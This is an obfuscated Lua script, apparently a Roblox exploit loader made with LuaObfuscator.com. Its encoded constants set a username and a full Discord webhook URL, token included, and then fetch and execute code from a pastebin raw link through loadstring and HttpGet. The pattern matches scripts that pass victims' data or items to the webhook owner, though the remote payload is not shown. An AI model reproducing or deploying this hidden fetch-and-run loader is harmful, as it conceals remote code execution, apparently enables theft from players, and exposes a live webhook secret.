--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v90=v5(v82,v19);v19=nil;return v90;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v83-(v83%(620 -(555 + 11 + 53))) ;else local v84=((1810 -(282 + 595)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and 1) or ((233 + 694) -(214 + 713)) ;end end local function v21() local v34=0;local v35;while true do if (v34==1) then return v35;end if (v34==(1637 -(1523 + 114))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 -(1065 -(68 + 997)) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v37 * (373 -(32 + 85))) + v36 ;end local function v23() local v38=0 + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 + 0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;v38=1 -0 ;end if (v38==(1 -0)) then return (v42 * (41190819 -24413603)) + (v41 * (65886 -(87 + 263))) + (v40 * (436 -(67 + 113))) + v39 ;end end end local function v24() local v43=430 -(44 + 386) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==2) then v48=v20(v45,21,23 + 8 );v49=((v20(v45,127 -95 )==(953 -((2288 -(998 + 488)) + 48 + 102))) and  -(2 -1)) or 1 ;v43=3;end if (v43==((0 + 0) -0)) then v44=v23();v45=v23();v43=1 + 0 ;end if (v43==(1000 -(915 + 82))) then if (v48==((772 -(201 + 571)) -0)) then if (v47==(0 + 0)) then return v49 * (0 -0) ;else v48=1188 -(1069 + 118) ;v46=0 -0 ;end elseif (v48==(4477 -2430)) then return ((v47==((1138 -(116 + 1022)) + 0)) and (v49 * ((1 -0)/(0 + 0)))) or (v49 * NaN) ;end return v8(v49,v48-(1814 -(368 + 423)) ) * (v46 + (v47/((6 -(16 -12))^((42 + 28) -(10 + 8))))) ;end if ((3 -(7 -5))==v43) then v46=443 -(416 + 26) ;v47=(v20(v45,3 -2 ,20) * ((1 + 1)^(56 -24))) + v44 ;v43=440 -(145 + (1040 -747)) ;end end end local function v25(v50) local v51=(4067 -3208) -(814 + 45) ;local v52;local v53;while true do if (v51==((0 + 0) -0)) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1 + 0 ;end if (1==v51) then v52=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;v51=887 -(261 + 624) ;end if (v51==(3 -1)) then v53={};for v91=(3721 -2640) -(1020 + 60) , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=1426 -(630 + 793) ;end if ((9 -6)==v51) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 0;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54==0) then local v88=(function() return 0;end)();while true do if (v88~=(6 -4)) then else v54=(function() return 3 -2 ;end)();break;end if ((374 -(123 + 251))==v88) then v55=(function() return function(v109,v110,v111) local v112=(function() return 0;end)();while true do if (v112~=(0 -0)) then else v109[v110-#"/" ]=(function() return v111();end)();return v109,v110,v111;end end end;end)();v56=(function() return {};end)();v88=(function() return 699 -(208 + 490) ;end)();end if (v88~=1) then else v57=(function() return {};end)();v58=(function() return {};end)();v88=(function() return 2;end)();end end end if (v54==(1 + 0)) then v59=(function() return {v56,v57,nil,v58};end)();v60=(function() return v23();end)();v61=(function() return {};end)();for v93= #"|",v60 do local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();local v97=(function() return;end)();while true do if (v94~=(0 + 0)) then else v95=(function() return 0;end)();v96=(function() return nil;end)();v94=(function() return 837 -(660 + 176) ;end)();end if (1==v94) then v97=(function() return nil;end)();while true do if (v95~=0) then else v96=(function() return v21();end)();v97=(function() return nil;end)();v95=(function() return 1 + 0 ;end)();end if (v95~=(203 -(14 + 188))) then else if (v96== #"|") then v97=(function() return v21()~=0 ;end)();elseif (v96==2) then v97=(function() return v24();end)();elseif (v96~= #"gha") then else v97=(function() return v25();end)();end v61[v93]=(function() return v97;end)();break;end end break;end end end v54=(function() return 2;end)();end if (2==v54) then v59[ #"xxx"]=(function() return v21();end)();for v98= #"|",v23() do local v99=(function() return v21();end)();if (v20(v99, #",", #"\\")==(675 -(534 + 141))) then local v105=(function() return 0;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if ((1 + 1)~=v105) then else if (v20(v107, #"<", #":")== #"]") then v108[2 + 0 ]=(function() return v61[v108[2 + 0 ]];end)();end if (v20(v107,3 -1 ,2)== #"[") then v108[ #"19("]=(function() return v61[v108[ #"19("]];end)();end v105=(function() return 4 -1 ;end)();end if (v105==3) then if (v20(v107, #"xxx", #"nil")~= #"}") then else v108[ #"xnxx"]=(function() return v61[v108[ #".dev"]];end)();end v56[v98]=(function() return v108;end)();break;end if (1==v105) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==0) then local v152=(function() return 0 + 0 ;end)();local v153=(function() return;end)();while true do if (v152~=0) then else v153=(function() return 0 + 0 ;end)();while true do if (v153~=(396 -(115 + 281))) then else v108[ #"-19"]=(function() return v22();end)();v108[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v106== #"[") then v108[ #"xnx"]=(function() return v23();end)();elseif (v106==2) then v108[ #"-19"]=(function() return v23() -((4 -2)^16) ;end)();elseif (v106== #"xxx") then local v187=(function() return 0 + 0 ;end)();local v188=(function() return;end)();while true do if (v187~=0) then else v188=(function() return 0;end)();while true do if (v188==(0 -0)) then v108[ #"gha"]=(function() return v23() -(2^(58 -42)) ;end)();v108[ #"http"]=(function() return v22();end)();break;end end break;end end end v105=(function() return 869 -(550 + 317) ;end)();end if (v105~=(0 -0)) then else v106=(function() return v20(v99,2, #"-19");end)();v107=(function() return v20(v99, #"asd1",6);end)();v105=(function() return 1 -0 ;end)();end end end end for v100= #" ",v23() do v57,v100,v28=(function() return v55(v57,v100,v28);end)();end return v59;end end end local function v29(v62,v63,v64) local v65=v62[2 -1 ];local v66=v62[287 -(134 + 151) ];local v67=v62[1668 -(970 + 695) ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1 -0 ;local v73= -(1991 -(582 + 1408));local v74={};local v75={...};local v76=v12("#",...) -(1 -0) ;local v77={};local v78={};for v85=0 -0 ,v76 do if ((3629>=1417) and (v85>=v70)) then v74[v85-v70 ]=v75[v85 + (1825 -(1195 + 629)) ];else v78[v85]=v75[v85 + (1 -0) ];end end local v79=(v76-v70) + (242 -(187 + 54)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[781 -(162 + 618) ];if (v81<=(4 + 1)) then if (v81<=2) then if (v81<=(0 + 0)) then v64[v80[6 -3 ]]=v78[v80[2 -0 ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[1 + 1 ]]=v80[1639 -(1373 + 263) ];v72=v72 + (1001 -(451 + 378 + 171)) ;v80=v68[v72];v64[v80[1 + 2 ]]=v78[v80[2 -0 ]];v72=v72 + (1 -(1257 -(1043 + 214))) ;v80=v68[v72];v78[v80[1386 -(746 + 638) ]]=v80[2 + (3 -2) ];v72=v72 + ((1213 -(323 + 889)) -0) ;v80=v68[v72];v72=v80[344 -((586 -368) + (703 -(361 + 219))) ];elseif ((4795>402) and (v81==(1582 -(1535 + 46)))) then do return;end else local v126=v80[2 + 0 ];v78[v126]=v78[v126](v13(v78,v126 + 1 + (320 -(53 + 267)) ,v73));end elseif ((4813>3565) and (v81<=3)) then for v123=v80[562 -(306 + 254) ],v80[1 + 2 ] do v78[v123]=nil;end elseif (v81>4) then v78[v80[3 -1 ]]=v64[v80[(333 + 1137) -(899 + 568) ]];else v78[v80[2 + 0 ]]=v80[7 -4 ];end elseif (v81<=(611 -(268 + 335))) then if (v81<=(296 -(60 + 230))) then v78[v80[574 -(426 + 146) ]]();elseif (v81>7) then local v132=0 + (413 -(15 + 398)) ;local v133;local v134;local v135;local v136;local v137;while true do if (v132==(1461 -((1264 -(18 + 964)) + 1174))) then v72=v80[814 -(569 + 242) ];break;end if ((3912==3912) and (v132==(5 -3))) then v80=v68[v72];v78[v80[1 + 1 ]]=v80[1027 -(706 + 318) ];v72=v72 + (1252 -(721 + 530)) ;v80=v68[v72];v137=v80[(4791 -3518) -(945 + 326) ];v134,v135=v71(v78[v137](v13(v78,v137 + 1 ,v80[7 -4 ])));v132=3;end if (v132==(3 + 0)) then v73=(v135 + v137) -(701 -(271 + 429)) ;v133=0 + 0 ;for v181=v137,v73 do v133=v133 + (1501 -(1408 + 92)) ;v78[v181]=v134[v133];end v72=v72 + 1 ;v80=v68[v72];v137=v80[(630 + 458) -(461 + 625) ];v132=1292 -(993 + 295) ;end if (v132==(0 + 0)) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v78[v80[(740 + 433) -(418 + (1603 -(20 + 830))) ]]=v64[v80[2 + 1 ]];v72=v72 + 1 + 0 ;v132=1;end if (v132==(1 + 0)) then v80=v68[v72];v137=v80[1 + 1 ];v136=v78[v80[1 + 2 ]];v78[v137 + 1 ]=v136;v78[v137]=v136[v80[533 -(406 + 123) ]];v72=v72 + 1 ;v132=1771 -(1749 + 20) ;end if ((2821<=4824) and (v132==(1 + 3))) then v78[v137]=v78[v137](v13(v78,v137 + 1 ,v73));v72=v72 + ((1449 -(116 + 10)) -(1249 + 73)) ;v80=v68[v72];v78[v80[1 + 1 ]]();v72=v72 + (1146 -(466 + 679)) ;v80=v68[v72];v132=5;end end else local v138=0 -0 ;local v139;local v140;while true do if (v138==(0 -0)) then v139=v80[(141 + 1761) -(106 + (2532 -(542 + 196))) ];v140=v78[v80[1 + 2 ]];v138=1 + 0 ;end if (v138==(2 -(1 -0))) then v78[v139 + (2 -1) ]=v140;v78[v139]=v140[v80[4]];break;end end end elseif ((1738<=2195) and (v81<=(124 -(4 + 110)))) then if (v81==((174 + 419) -(57 + 527))) then if (v78[v80[1429 -(41 + 705 + 681) ]]==v80[4]) then v72=v72 + (104 -(17 + 86)) ;else v72=v80[3 + 0 ];end else v64[v80[6 -3 ]]=v78[v80[5 -3 ]];end elseif ((41<=3018) and (v81>(177 -(122 + 44)))) then local v143=v80[2 -0 ];local v144,v145=v71(v78[v143](v13(v78,v143 + ((2 + 1) -(4 -2)) ,v80[3 + 0 ])));v73=(v145 + v143) -(1 + 0) ;local v146=0 -(0 -0) ;for v154=v143,v73 do v146=v146 + 1 ;v78[v154]=v144[v146];end else v72=v80[3];end v72=v72 + (66 -(30 + 35)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F617141312Q36486303083Q00557365726E616D65030A3Q002Q53412Q76412Q47453203073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313330363132353330333130313532363130392F634F313832614A50734270436E6F742Q724A7A7163506C5947306B736D4B716143503042746F537076526272696B483245634A5F754A68513136482D6D53565A2Q435259001A3Q0012043Q00014Q0003000100013Q0026093Q00020001000100040B3Q00020001001204000100013Q0026090001000F0001000200040B3Q000F0001001205000200033Q001208000300043Q00202Q00030003000500122Q000500066Q000300056Q00023Q00024Q00020001000100044Q00190001002609000100050001000100040B3Q00050001001204000200083Q00122Q000200073Q00122Q0002000A3Q00122Q000200093Q00122Q000100023Q00044Q0005000100040B3Q0019000100040B3Q000200012Q00013Q00017Q00",v9(),...);
